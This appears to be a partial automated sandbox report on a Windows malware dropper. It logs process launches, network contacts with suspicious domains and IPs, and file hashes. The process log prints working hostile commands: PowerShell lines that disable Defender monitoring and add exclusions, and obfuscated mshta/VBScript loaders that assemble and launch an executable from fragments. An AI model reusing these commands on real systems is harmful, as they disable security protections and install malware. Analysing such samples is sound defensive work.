PID 1256 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed096e68af113.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe

Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe

Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2600 -ip 2600

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe

Wed09a6fb1d0dd846.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe

Wed0988d1c2bd9a37.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe

Wed098e48a54663552b.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe

Wed094d15aaa9a48.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe

Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe

Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe

Wed0911cd5800a45.exe

C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$40288,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 572

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe

Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3152 -ip 3152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 244

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe

"C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$A0112,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed0911cd5800a45.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv z76pfHFsR0SkYGbr62ILBA.0.2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 sayanu.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
NL 45.133.1.107:80 tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 t.gogamec.com udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
N/A 127.0.0.1:59128 tcp
N/A 127.0.0.1:59130 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
FR 51.178.186.149:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 70.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 www.qxsgxd.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe

MD5 3fce5aacf6f9eb4b34126d0c2a9d36c2
SHA1 5590c4402fcda16fe873f857088b4ee6c38858b1
SHA256 ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12
SHA512 ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2600-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-70-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2600-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/840-71-0x000000007371E000-0x000000007371F000-memory.dmp

memory/2600-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

memory/840-85-0x0000000005210000-0x0000000005246000-memory.dmp

memory/840-86-0x0000000073710000-0x0000000073EC0000-memory.dmp

memory/3664-87-0x0000000005A50000-0x0000000006078000-memory.dmp

memory/840-89-0x0000000073710000-0x0000000073EC0000-memory.dmp

memory/3664-91-0x0000000073710000-0x0000000073EC0000-memory.dmp

memory/1836-92-0x0000000000940000-0x0000000000948000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

memory/3664-120-0x00000000061D0000-0x0000000006524000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/4184-137-0x0000000000650000-0x00000000006C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-9P55F.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/5104-136-0x0000000004DF0000-0x0000000004DF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/980-148-0x0000000005910000-0x0000000005EB4000-memory.dmp

memory/3256-153-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4452-156-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/964-158-0x0000000000400000-0x0000000000414000-memory.dmp

memory/980-134-0x0000000005020000-0x000000000503E000-memory.dmp

memory/1104-121-0x00000000004F0000-0x0000000000560000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hehtl4dv.k4u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3664-106-0x00000000060F0000-0x0000000006156000-memory.dmp

memory/980-105-0x0000000005040000-0x00000000050B6000-memory.dmp

memory/980-103-0x0000000000900000-0x0000000000972000-memory.dmp

memory/3664-107-0x0000000006160000-0x00000000061C6000-memory.dmp

memory/5104-104-0x0000000000530000-0x0000000000546000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

memory/3664-102-0x0000000005A10000-0x0000000005A32000-memory.dmp

memory/3664-161-0x0000000006790000-0x00000000067AE000-memory.dmp

memory/964-96-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-V9RJ3.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/3664-171-0x0000000006850000-0x000000000689C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/3664-84-0x0000000073710000-0x0000000073EC0000-memory.dmp

memory/2600-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2600-64-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2600-63-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2600-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2600-60-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2600-59-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2600-58-0x00000000007B0000-0x000000000083F000-memory.dmp

memory/2600-57-0x000000006B440000-0x000000006B4CF000-memory.dmp

